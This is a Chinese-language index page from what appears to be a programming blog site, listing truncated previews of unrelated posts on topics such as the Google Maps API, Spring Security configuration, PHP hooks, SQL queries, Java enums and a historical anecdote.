           非常好看,超能查派,这部电影......为我们这些热爱人工智能的工程技术人员提供一些参考意见和思想........        虽然电影里面的人物形象不是非常的可爱....但是非常的贴近现实生活....    &nbs
  • Google Map API V2 dai_lm google map
    以后如果要开发包含google map的程序就更麻烦咯 http://www.cnblogs.com/mengdd/archive/2013/01/01/2841390.html 找到篇不错的文章,大家可以参考一下 http://blog.sina.com.cn/s/blog_c2839d410101jahv.html 1. 创建Android工程 由于v2的key需要G
  • java数据计算层的几种解决方法2 datamachine javasql集算器
    2、SQL     SQL/SP/JDBC在这里属于一类,这是老牌的数据计算层,性能和灵活性是它的优势。但随着新情况的不断出现,单纯用SQL已经难以满足需求,比如: JAVA开发规模的扩大,数据量的剧增,复杂计算问题的涌现。虽然SQL得高分的指标不多,但都是权重最高的。     成熟度:5星。最成熟的。   
  • Linux下Telnet的安装与运行 dcj3sjt126com linuxtelnet
    Linux下Telnet的安装与运行   linux默认是使用SSH服务的 而不安装telnet服务  如果要使用telnet 就必须先安装相应的软件包  即使安装了软件包 默认的设置telnet 服务也是不运行的 需要手工进行设置 如果是redhat9,则在第三张光盘中找到 telnet-server-0.17-25.i386.rpm
  • PHP中钩子函数的实现与认识 dcj3sjt126com PHP
    假如有这么一段程序: function fun(){ fun1(); fun2(); }   首先程序执行完fun1()之后执行fun2()然后fun()结束。   但是,假如我们想对函数做一些变化。比如说,fun是一个解析函数,我们希望后期可以提供丰富的解析函数,而究竟用哪个函数解析,我们希望在配置文件中配置。这个时候就可以发挥钩子的力量了。   我们可以在fu
  • EOS中的WorkSpace密码修改 蕃薯耀 修改WorkSpace密码
    EOS中BPS的WorkSpace密码修改 >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 201
  • SpringMVC4零配置--SpringSecurity相关配置【SpringSecurityConfig】 hanqunfeng SpringSecurity
     SpringSecurity的配置相对来说有些复杂,如果是完整的bean配置,则需要配置大量的bean,所以xml配置时使用了命名空间来简化配置,同样,spring为我们提供了一个抽象类WebSecurityConfigurerAdapter和一个注解@EnableWebMvcSecurity,达到同样减少bean配置的目的,如下:   applicationContex
  • ie 9 kendo ui中ajax跨域的问题 jackyrong AJAX跨域
    这两天遇到个问题,kendo ui的datagrid,根据json去读取数据,然后前端通过kendo ui的datagrid去渲染,但很奇怪的是,在ie 10,ie 11,chrome,firefox等浏览器中,同样的程序, 浏览起来是没问题的,但把应用放到公网上的一台服务器, 却发现如下情况: 1) ie 9下,不能出现任何数据,但用IE 9浏览器浏览本机的应用,却没任何问题
  • 不要让别人笑你不能成为程序员 lampcy 编程程序员
    在经历六个月的编程集训之后,我刚刚完成了我的第一次一对一的编码评估。但是事情并没有如我所想的那般顺利。 说实话,我感觉我的脑细胞像被轰炸过一样。 手慢慢地离开键盘,心里很压抑。不禁默默祈祷:一切都会进展顺利的,对吧?至少有些地方我的回答应该是没有遗漏的,是不是? 难道我选择编程真的是一个巨大的错误吗——我真的永远也成不了程序员吗? 我需要一点点安慰。在自我怀疑,不安全感和脆弱等等像龙卷风一
  • 马皇后的贤德 nannan408
       马皇后不怕朱元璋的坏脾气,并敢理直气壮地吹耳边风。众所周知,朱元璋不喜欢女人干政,他认为“后妃虽母仪天下,然不可使干政事”,因为“宠之太过,则骄恣犯分,上下失序”,因此还特地命人纂述《女诫》,以示警诫。但马皇后是个例外。   有一次,马皇后问朱元璋道:“如今天下老百姓安居乐业了吗?”朱元璋不高兴地回答:“这不是你应该问的。”马皇后振振有词地回敬道:“陛下是天下之父,
  • 选择某个属性值最大的那条记录(不仅仅包含指定属性,而是想要什么属性都可以) Rainbow702 sqlgroup by最大值max最大的那条记录
    好久好久不写SQL了,技能退化严重啊!!!   直入主题: 比如我有一张表,file_info, 它有两个属性(但实际不只,我这里只是作说明用): file_code, file_version 同一个code可能对应多个version 现在,我想针对每一个code,取得它相关的记录中,version 值 最大的那条记录, SQL如下: select *
  • VBScript脚本语言 tntxia VBScript
      VBScript 是基于VB的脚本语言。主要用于Asp和Excel的编程。   VB家族语言简介   Visual Basic 6.0           源于BASIC语言。           由微软公司开发的包含协助开发环境的事
  • java中枚举类型的使用 xiao1zhao2 javaenum枚举1.5新特性
    枚举类型是j2se在1.5引入的新的类型,通过关键字enum来定义,常用来存储一些常量.   1.定义一个简单的枚举类型 public enum Sex { MAN, WOMAN }   枚举类型本质是类,编译此段代码会生成.class文件.通过Sex.MAN来访问Sex中的成员,其返回值是Sex类型.   2.常用方法 静态的values()方
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他